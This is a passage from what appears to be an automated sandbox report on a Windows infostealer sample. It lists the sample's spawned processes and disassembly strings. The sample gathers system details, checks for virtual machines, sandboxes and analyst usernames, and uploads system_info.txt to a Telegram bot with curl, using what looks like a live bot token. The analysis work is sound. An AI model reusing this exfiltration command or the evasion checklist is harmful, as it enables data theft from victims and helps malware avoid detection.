                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:16:52:07
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic" computersystem get totalphysicalmemory
                                      Imagebase:0x7ff6f2f80000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:16:52:07
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x720000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:16:52:07
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic" diskdrive get model,size
                                      Imagebase:0x7ff6f2f80000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:16:52:07
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:16:52:08
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayName
                                      Imagebase:0x7ff6f2f80000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:16:52:08
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:16:52:09
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\getmac.exe
                                      Wow64 process (32bit):false
                                      Commandline:"getmac"
                                      Imagebase:0x7ff7959e0000
                                      File size:90'112 bytes
                                      MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:14
                                      Start time:16:52:09
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:16
                                      Start time:16:52:10
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\systeminfo.exe
                                      Wow64 process (32bit):false
                                      Commandline:"systeminfo"
                                      Imagebase:0x7ff6694a0000
                                      File size:110'080 bytes
                                      MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:17
                                      Start time:16:52:10
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:18
                                      Start time:16:52:10
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /m sbiedll.dll
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:19
                                      Start time:16:52:10
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:20
                                      Start time:16:52:11
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /m dbghelp.dll
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:21
                                      Start time:16:52:11
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:22
                                      Start time:16:52:11
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /m api_log.dll
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:23
                                      Start time:16:52:11
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:24
                                      Start time:16:52:12
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /m dir_watch.dll
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:25
                                      Start time:16:52:12
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:26
                                      Start time:16:52:12
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /m pstorec.dll
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:27
                                      Start time:16:52:12
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:28
                                      Start time:16:52:13
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /m vmcheck.dll
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:29
                                      Start time:16:52:13
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:30
                                      Start time:16:52:13
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /m wpespy.dll
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:31
                                      Start time:16:52:13
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:32
                                      Start time:16:52:14
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic" computersystem get model
                                      Imagebase:0x7ff6f2f80000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:33
                                      Start time:16:52:14
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:34
                                      Start time:16:52:15
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /fi "IMAGENAME eq vmtoolsd.exe"
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:35
                                      Start time:16:52:15
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:36
                                      Start time:16:52:15
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /fi "IMAGENAME eq vboxservice.exe"
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:37
                                      Start time:16:52:15
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:38
                                      Start time:16:52:15
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /fi "IMAGENAME eq vboxtray.exe"
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:39
                                      Start time:16:52:15
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:40
                                      Start time:16:52:15
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic" csproduct get identifyingnumber
                                      Imagebase:0x7ff6f2f80000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:41
                                      Start time:16:52:15
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:45
                                      Start time:16:53:16
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\curl.exe
                                      Wow64 process (32bit):false
                                      Commandline:"curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=284330-4180-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument
                                      Imagebase:0x7ff7f2c50000
                                      File size:530'944 bytes
                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:46
                                      Start time:16:53:16
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 00007FF7F41218F0 Relevance: 87.3, APIs: 40, Strings: 8, Instructions: 3341COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: EnvironmentStrings$CloseFreeHandle
                                        • String ID: #$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "batch file arguments are invalid$.exeprogram not found$PATHlibrary\std\src\sys_common\process.rs$\?\\$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0$exe\\.\NUL\cmd.exemaximum number of ProcThreadAttributes exceeded
                                        • API String ID: 1070102993-4160752474
                                        • Opcode ID: 5960bd245e651a0bc203704549e0705ff5c241d70c3ce5bb9b48f6b46ba59082
                                        • Instruction ID: 819d47778662e57c1f739317d54549f3c861eb97860f7d780abf1838af8d1e3f
                                        • Opcode Fuzzy Hash: 5960bd245e651a0bc203704549e0705ff5c241d70c3ce5bb9b48f6b46ba59082
                                        • Instruction Fuzzy Hash: 9A739362E18AD1CAEB709F26EC803FD67A0FB44789F805135CA6D8BBD5DF3992518350
                                        Function 00007FF7F4102720 Relevance: 31.2, APIs: 1, Strings: 18, Instructions: 2749COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: /ficsproductidentifyingnumber$12345678$1RLV$COMPUTERNAMEComputer Name: $F0CF008J$L1HF0CF0$USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel$a Display implementation returned an error unexpectedly/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\alloc\src\string.rs$ed.$getmacMAC Address: $nown$ormation$sbiedll.dlldbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARA$system_info.txtFailed to write to file: $systeminfoSystem Info: $tected.$wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq $x DLLs:
                                        • API String ID: 0-225615594
                                        • Opcode ID: 249bcf8dd2f332ae1225c476441c98646916a24004a58fc37924a2357b234292
                                        • Instruction ID: 847771175c8fb479b15be40e0bd693079503a6e4294149eb71d034570702d76c
                                        • Opcode Fuzzy Hash: 249bcf8dd2f332ae1225c476441c98646916a24004a58fc37924a2357b234292
                                        • Instruction Fuzzy Hash: BB736D72A05BC18AE7719F26EC843E973A4FB44788F904135CA5C5BB99EF399394C390
                                        Function 00007FF7F411FDF0 Relevance: 8.0, APIs: 5, Instructions: 503COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2213 7ff7f411fdf0-7ff7f411fe53 2214 7ff7f411fe60-7ff7f411fe73 GetCurrentProcessId 2213->2214 2215 7ff7f411fea6-7ff7f411ff3a call 7ff7f4132200 2214->2215 2216 7ff7f411fe75 2214->2216 2220 7ff7f411ff3c-7ff7f411ff48 call 7ff7f410a130 2215->2220 2221 7ff7f411ff4d-7ff7f411ff7d 2215->2221 2218 7ff7f411fe80-7ff7f411fea4 ProcessPrng 2216->2218 2218->2215 2218->2218 2220->2221 2223 7ff7f411ffa0-7ff7f411ffbd 2221->2223 2224 7ff7f411ff7f-7ff7f411ff8a 2221->2224 2227 7ff7f4120093-7ff7f41200af call 7ff7f410a120 2223->2227 2225 7ff7f411ff8c-7ff7f411ff90 2224->2225 2226 7ff7f411ffd0-7ff7f411ffe2 2224->2226 2229 7ff7f4120034-7ff7f4120039 2225->2229 2230 7ff7f4120028-7ff7f4120031 2226->2230 2231 7ff7f411ffe4-7ff7f411fff6 2226->2231 2237 7ff7f41205a3-7ff7f41205cd call 7ff7f413f3f0 2227->2237 2238 7ff7f41200b5-7ff7f41200d4 2227->2238 2235 7ff7f412003c-7ff7f412007e 2229->2235 2230->2229 2233 7ff7f411fffc-7ff7f4120021 2231->2233 2234 7ff7f41203f4-7ff7f4120405 2231->2234 2233->2229 2239 7ff7f4120023 2233->2239 2234->2229 2236 7ff7f412040b-7ff7f4120434 2234->2236 2240 7ff7f41205a1 2235->2240 2241 7ff7f4120084-7ff7f412008e 2235->2241 2236->2235 2246 7ff7f41205d2-7ff7f412060b 2237->2246 2242 7ff7f41200f3-7ff7f41200f9 2238->2242 2239->2236 2240->2237 2241->2227 2244 7ff7f41201a0-7ff7f41201a5 2242->2244 2245 7ff7f41200ff-7ff7f4120103 2242->2245 2249 7ff7f41201ab-7ff7f41201b3 2244->2249 2250 7ff7f4120340-7ff7f4120388 CreateNamedPipeW 2244->2250 2247 7ff7f4120160-7ff7f4120167 2245->2247 2248 7ff7f4120105-7ff7f412010b 2245->2248 2251 7ff7f412060d-7ff7f412061d call 7ff7f410a130 2246->2251 2252 7ff7f4120622-7ff7f412065b 2246->2252 2247->2244 2260 7ff7f4120169-7ff7f4120177 2247->2260 2258 7ff7f412010d-7ff7f412014f 2248->2258 2259 7ff7f41200e0-7ff7f41200f0 2248->2259 2253 7ff7f4120230-7ff7f4120236 2249->2253 2254 7ff7f41201b5-7ff7f41201d5 2249->2254 2256 7ff7f412038e-7ff7f41203a5 GetLastError 2250->2256 2257 7ff7f41204a6-7ff7f41204b0 2250->2257 2251->2252 2270 7ff7f412023e 2253->2270 2261 7ff7f4120598 2254->2261 2262 7ff7f41201db-7ff7f412020d 2254->2262 2263 7ff7f4120439-7ff7f4120453 2256->2263 2264 7ff7f41203ab-7ff7f41203b1 2256->2264 2266 7ff7f41204b2-7ff7f41204c1 call 7ff7f410a130 2257->2266 2267 7ff7f41204c6-7ff7f4120535 call 7ff7f411e610 2257->2267 2258->2262 2265 7ff7f4120155 2258->2265 2259->2242 2268 7ff7f412026c-7ff7f4120281 2260->2268 2269 7ff7f412017d-7ff7f4120189 2260->2269 2274 7ff7f412059a-7ff7f412059f call 7ff7f413f3f0 2261->2274 2262->2270 2271 7ff7f412020f-7ff7f4120223 2262->2271 2272 7ff7f4120466-7ff7f4120469 2263->2272 2273 7ff7f4120455-7ff7f4120461 call 7ff7f410a130 2263->2273 2275 7ff7f41203c0-7ff7f41203c3 2264->2275 2276 7ff7f41203b3-7ff7f41203bd 2264->2276 2265->2261 2266->2267 2292 7ff7f412053a-7ff7f412053d 2267->2292 2278 7ff7f41202ca-7ff7f41202e2 2268->2278 2279 7ff7f4120283-7ff7f4120295 2268->2279 2269->2259 2280 7ff7f412018f 2269->2280 2283 7ff7f4120240-7ff7f4120253 call 7ff7f4113e00 2270->2283 2271->2283 2285 7ff7f412047c-7ff7f4120480 2272->2285 2286 7ff7f412046b-7ff7f4120477 call 7ff7f410a130 2272->2286 2273->2272 2274->2246 2275->2263 2289 7ff7f41203c5-7ff7f41203cb 2275->2289 2288 7ff7f41203cd-7ff7f41203d9 2276->2288 2278->2259 2282 7ff7f41202e8 2278->2282 2290 7ff7f4120297-7ff7f41202c2 2279->2290 2291 7ff7f41202ed-7ff7f4120304 2279->2291 2280->2258 2282->2291 2306 7ff7f4120258-7ff7f412025d 2283->2306 2298 7ff7f412048b-7ff7f41204a5 2285->2298 2299 7ff7f4120482-7ff7f4120485 CloseHandle 2285->2299 2286->2285 2288->2214 2301 7ff7f41203df-7ff7f41203ef call 7ff7f410a130 2288->2301 2289->2263 2289->2288 2290->2248 2302 7ff7f41202c8 2290->2302 2291->2248 2295 7ff7f412030a-7ff7f4120331 2291->2295 2293 7ff7f412055c-7ff7f4120572 2292->2293 2294 7ff7f412053f-7ff7f4120551 2292->2294 2293->2298 2304 7ff7f4120578-7ff7f4120589 call 7ff7f410a130 2293->2304 2294->2286 2303 7ff7f4120557 2294->2303 2295->2259 2305 7ff7f4120337 2295->2305 2299->2298 2301->2214 2302->2295 2303->2285 2304->2298 2305->2258 2309 7ff7f412058e-7ff7f4120596 2306->2309 2310 7ff7f4120263 2306->2310 2309->2274 2310->2268
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: Process$CurrentPrng
                                        • String ID:
                                        • API String ID: 716580790-0
                                        • Opcode ID: 09d2c0eac5f259194c220c55946c3fb403d336c09e5686cb49c32fa7fa278b81
                                        • Instruction ID: e7dfddcb5630be65805a9b511e479645e5628083f523d5dd3df26f52f705202a
                                        • Opcode Fuzzy Hash: 09d2c0eac5f259194c220c55946c3fb403d336c09e5686cb49c32fa7fa278b81
                                        • Instruction Fuzzy Hash: 5D22D562E08A818AE7649F26E8803FA7BA0FB44798F504235DE6D877D5DF7DD244C390
                                        Function 00007FF7F411EB20 Relevance: 4.6, APIs: 3, Instructions: 143fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CloseFind$FileFirstHandle
                                        • String ID:
                                        • API String ID: 1310327803-0
                                        • Opcode ID: 108ad1669d5f654cf7088fbd5db76f8917ec5f9a1101b15b5fb6b39ab74f4e40
